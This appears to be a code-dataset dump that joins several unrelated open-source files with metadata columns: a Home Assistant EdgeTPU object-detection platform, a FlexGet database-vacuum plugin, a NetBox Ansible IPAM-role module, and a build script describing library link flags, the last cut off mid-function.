DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the EdgeTPU image processing platform."""
try:
# Verify that the TensorFlow Object Detection API is pre-installed
# pylint: disable=unused-import,unused-variable
from edgetpu.detection.engine import DetectionEngine
except ImportError:
# pylint: disable=line-too-long
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ") # noqa
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
"""Representation of an EdgeTPU image processor."""
def __init__(self, hass, camera_entity, name, config):
"""Initialize the EdgeTPU entity."""
from edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
# ATTR_SUMMARY: {item: len(values)
# for item, values in self._matches.items()},
ATTR_TOTAL_MATCHES: self._total_matches
}
# Function to read labels from text files.
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
"""Process the image."""
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
# Open image.
# _LOGGER.info("image = %s", image)
import io
img = Image.open(io.BytesIO(bytearray(image)))
# img.save("/tmp/test.jpg")
draw = ImageDraw.Draw(img)
# Run inference.
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
# Display result.
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
# Draw a rectangle.
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| 35.973822 | 98 | 0.627129 | import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
try:
from edgetpu.detection.engine import DetectionEngine
except ImportError:
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ")
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
def __init__(self, hass, camera_entity, name, config):
from edgetpu.detection.engine import DetectionEngine
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
return self._camera_entity
@property
def name(self):
return self._name
@property
def state(self):
return self._total_matches
@property
def device_state_attributes(self):
return {
ATTR_MATCHES: self._matches,
ATTR_TOTAL_MATCHES: self._total_matches
}
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
import io
img = Image.open(io.BytesIO(bytearray(image)))
draw = ImageDraw.Draw(img)
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| true | true |
f72ec0d8575ad1e8a480b6dfdd46dd3ea6886bf8 | 852 | py | Python | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2017-08-25T07:17:04.000Z | 2017-08-25T07:17:04.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2015-11-10T01:07:54.000Z | 2015-11-10T01:07:54.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24) # 6 months
# Run after the cleanup is actually finished, but before analyze
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
# Vacuum can take a long time, and is not needed frequently
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| 40.571429 | 91 | 0.766432 | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24)
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| true | true |
f72ec1736a03659240a215c3e1fbd08ab2fda8f4 | 4,325 | py | Python | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Mikhail Yohman (@FragmentedPacket)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
"""
Main entry point for module execution
"""
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__": # pragma: no cover
main()
| 26.697531 | 97 | 0.652948 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__":
main()
| true | true |
f72ec1db4dbbb5d7b20d5ea18b138b8111539f7c | 17,753 | py | Python | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5 | 2015-02-27T21:42:28.000Z | 2021-10-10T23:36:08.000Z | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2015-06-15T09:57:56.000Z | 2017-05-14T01:11:48.000Z | # Some notes about static linking:
# There are two ways of linking to static library: using the -l command line
# option or specifying the full path to the library file as one of the inputs.
# When using the -l option, the library search paths will be searched for a
# dynamic version of the library, if that is not found, the search paths will
# be searched for a static version of the library. This means we cannot force
# static linking of a library this way. It is possible to force static linking
# of all libraries, but we want to control it per library.
# Conclusion: We have to specify the full path to each library that should be
# linked statically.
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
	"""Describes one external library: how to locate it, compile against
	it and link it, either dynamically or statically.

	Subclasses override the class attributes below (and, where needed,
	the class methods) to describe a specific library.
	"""
	# Base name of the library file, without the "lib" prefix or a file
	# extension; used as "-l<libName>" / "lib<libName>.a" in getLinkFlags().
	libName = None
	# Name used to refer to this library in make variables — presumably;
	# not used in this class, confirm usage elsewhere in this file.
	makeName = None
	# Main header(s) of the library: a single name or a sequence of names
	# (see getHeaders()).
	header = None
	# Name of the library's config script (e.g. "sdl-config"), or None if
	# the library has no such script.
	configScriptName = None
	# Config script option that prints the flags for dynamic linking.
	dynamicLibsOption = '--libs'
	# Config script option that prints the flags for static linking, or
	# None if the script offers no such option (getLinkFlags() then falls
	# back to constructing the flags itself).
	staticLibsOption = None
	# Name of one function from this library; presumably used to probe for
	# the library's presence — confirm against the probe code.
	function = None
	# TODO: A library can give an application compile time and run time
	#       dependencies on other libraries. For example SDL_ttf depends on
	#       FreeType only at run time, but depends on SDL both compile time
	#       and run time, since SDL is part of its interface and FreeType is
	#       only used by the implementation. As a result, it is possible to
	#       compile against SDL_ttf without having the FreeType headers
	#       installed. But our getCompileFlags() does not support this.
	#       In pkg-config these are called private dependencies.
	# Names (keys into librariesByName) of libraries this one depends on.
	dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform): # pylint: disable-msg=W0613
'''Returns True iff this library is a system library on the given
platform.
A system library is a library that is available systemwide in the
minimal installation of the OS.
The default implementation returns False.
'''
return False
@classmethod
def getConfigScript( # pylint: disable-msg=W0613
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
# TODO: A generic mechanism for locating config scripts in SDKs.
# Note that distroRoot is for non-system libs only.
# Trying a path relative to the compiler location would
# probably work well.
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform): # pylint: disable-msg=W0613
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform): # pylint: disable-msg=W0613
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
'''Returns the version of this library, "unknown" if there is no
mechanism to retrieve the version, None if there is a mechanism
to retrieve the version but it failed, or a callable that takes a
CompileCommand and a log stream as its arguments and returns the
version or None if retrieval failed.
'''
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
	'''FreeType font rendering library.'''
	libName = 'freetype'
	makeName = 'FREETYPE'
	header = ('<ft2build.h>', 'FT_FREETYPE_H')
	configScriptName = 'freetype-config'
	function = 'FT_Open_Face'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform in ('android', 'dingux')

	@classmethod
	def getConfigScript(cls, platform, linkStatic, distroRoot):
		# On the BSDs, FreeType is located in the X11 tree, not the
		# ports tree, so redirect the default ports root there.
		if platform in ('netbsd', 'openbsd') and distroRoot == '/usr/local':
			distroRoot = '/usr/X11R6'
		return super(FreeType, cls).getConfigScript(
			platform, linkStatic, distroRoot
			)

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		# freetype-config reports the FreeType version via "--ftversion";
		# the generic "--version" option would not give what we want here.
		script = cls.getConfigScript(platform, linkStatic, distroRoot)
		return '`%s --ftversion`' % script
class GL(Library):
	'''OpenGL rendering library.'''
	libName = 'GL'
	makeName = 'GL'
	function = 'glGenTextures'

	@classmethod
	def isSystemLibrary(cls, platform):
		# On *BSD, OpenGL is in ports, not in the base system.
		return not platform.endswith('bsd')

	@classmethod
	def getHeaders(cls, platform):
		# Mac OS X uses a framework-style include path.
		return ('<OpenGL/gl.h>', ) if platform == 'darwin' else ('<GL/gl.h>', )

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		if platform not in ('netbsd', 'openbsd'):
			return super(GL, cls).getCompileFlags(
				platform, linkStatic, distroRoot
				)
		# On the BSDs the headers live in the X11 tree.
		return '-I/usr/X11R6/include -I/usr/X11R7/include'

	@classmethod
	def getLinkFlags(cls, platform, linkStatic, distroRoot):
		if platform == 'darwin':
			return '-framework OpenGL'
		if platform.startswith('mingw'):
			return '-lopengl32'
		if platform in ('netbsd', 'openbsd'):
			return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
		return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		def execute(cmd, log):
			# Probe which GL_VERSION_x_y macros the headers define and
			# report the highest (major, minor) that expanded.
			candidates = tuple(
				( hi, lo )
				for hi in range(1, 10)
				for lo in range(0, 10)
				)
			expanded = cmd.expand(log, cls.getHeaders(platform), *(
				'GL_VERSION_%d_%d' % pair for pair in candidates
				))
			defined = [
				pair
				for pair, value in zip(candidates, expanded)
				if value is not None
				]
			if defined:
				return '%d.%d' % max(defined)
			else:
				# No version macro expanded: version retrieval failed.
				return None
		return execute
class GLEW(Library):
	'''OpenGL Extension Wrangler library.'''
	makeName = 'GLEW'
	header = '<GL/glew.h>'
	function = 'glewInit'
	dependsOn = ('GL', )

	@classmethod
	def getLibName(cls, platform):
		# The Windows build of GLEW uses a different library name.
		return 'glew32' if platform.startswith('mingw') else 'GLEW'

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		flags = super(GLEW, cls).getCompileFlags(
			platform, linkStatic, distroRoot
			)
		if not (platform.startswith('mingw') and linkStatic):
			return flags
		# Static linking on MinGW needs this define so the headers emit
		# the right symbol import/export declarations.
		return '%s -DGLEW_STATIC' % flags
class LibPNG(Library):
	'''PNG image file format library (libpng 1.2).'''
	libName = 'png12'
	makeName = 'PNG'
	header = '<png.h>'
	configScriptName = 'libpng-config'
	# libpng-config reports link flags via "--ldflags" rather than the
	# usual "--libs".
	dynamicLibsOption = '--ldflags'
	function = 'png_write_image'
	dependsOn = ('ZLIB', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class LibXML2(Library):
	'''XML parsing library.'''
	libName = 'xml2'
	makeName = 'XML'
	header = '<libxml/parser.h>'
	configScriptName = 'xml2-config'
	function = 'xmlParseDocument'
	dependsOn = ('ZLIB', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android'

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		flags = super(LibXML2, cls).getCompileFlags(
			platform, linkStatic, distroRoot
			)
		wantStatic = linkStatic and not cls.isSystemLibrary(platform)
		# Static linking needs LIBXML_STATIC for correct symbol
		# declarations in the headers.
		return flags + ' -DLIBXML_STATIC' if wantStatic else flags
class OGG(Library):
	'''Ogg bitstream container library.'''
	libName = 'ogg'
	makeName = 'OGG'
	header = '<ogg/ogg.h>'
	function = 'ogg_stream_init'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class SDL(Library):
	'''Simple DirectMedia Layer.'''
	libName = 'SDL'
	makeName = 'SDL'
	header = '<SDL.h>'
	configScriptName = 'sdl-config'
	# sdl-config can report static link flags, unlike most config scripts.
	staticLibsOption = '--static-libs'
	function = 'SDL_Init'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class SDL_ttf(Library):
	'''TrueType font rendering on top of SDL.'''
	libName = 'SDL_ttf'
	makeName = 'SDL_TTF'
	header = '<SDL_ttf.h>'
	function = 'TTF_OpenFont'
	dependsOn = ('SDL', 'FREETYPE')

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		def execute(cmd, log):
			# Expand the version macros from the header; if any macro
			# fails to expand, the version is unknown.
			expanded = cmd.expand(log, cls.getHeaders(platform),
				'SDL_TTF_MAJOR_VERSION',
				'SDL_TTF_MINOR_VERSION',
				'SDL_TTF_PATCHLEVEL',
				)
			if None in expanded:
				return None
			return '%s.%s.%s' % expanded
		return execute
class TCL(Library):
	'''Tcl scripting language library.
	Tcl is configured by sourcing its tclConfig.sh script in a shell and
	reading the variables it sets, rather than by running a conventional
	lib-config executable; see getTclConfig().
	'''
	libName = 'tcl'
	makeName = 'TCL'
	header = '<tcl.h>'
	function = 'Tcl_CreateInterp'
	@classmethod
	def isSystemLibrary(cls, platform):
		return platform in ('android',)
	@classmethod
	def getTclConfig(cls, platform, distroRoot):
		'''Tcl has a config script that is unlike the typical lib-config script.
		Information is gathered by sourcing the config script, instead of
		executing it and capturing the queried value from stdout. This script
		is located in a library directory, not in a directory in the PATH.
		Also, it does not have the executable bit set.
		This method returns the location of the Tcl config script, or None if
		it could not be found.
		'''
		if hasattr(cls, 'tclConfig'):
			# Return cached value.
			return cls.tclConfig
		def iterLocations():
			# Generates candidate directories that may hold tclConfig.sh.
			if platform == 'android':
				# Under Android, the tcl set-up apparently differs from
				# other cross-platform setups. the search algorithm to find the
				# directory that will contain the tclConfig.sh script and the shared libs
				# is not applicable to Android. Instead, immediately return the correct
				# subdirectories to the routine that invokes iterLocations()
				sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
				libpath = sdl_android_port_path + '/project/libs/armeabi'
				yield libpath
				tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
				yield tclpath
			else:
				if distroRoot is None or cls.isSystemLibrary(platform):
					roots = ('/usr/local', '/usr')
				else:
					roots = (distroRoot, )
				for root in roots:
					if isdir(root):
						for libdir in ('lib', 'lib64', 'lib/tcl'):
							libpath = root + '/' + libdir
							if isdir(libpath):
								yield libpath
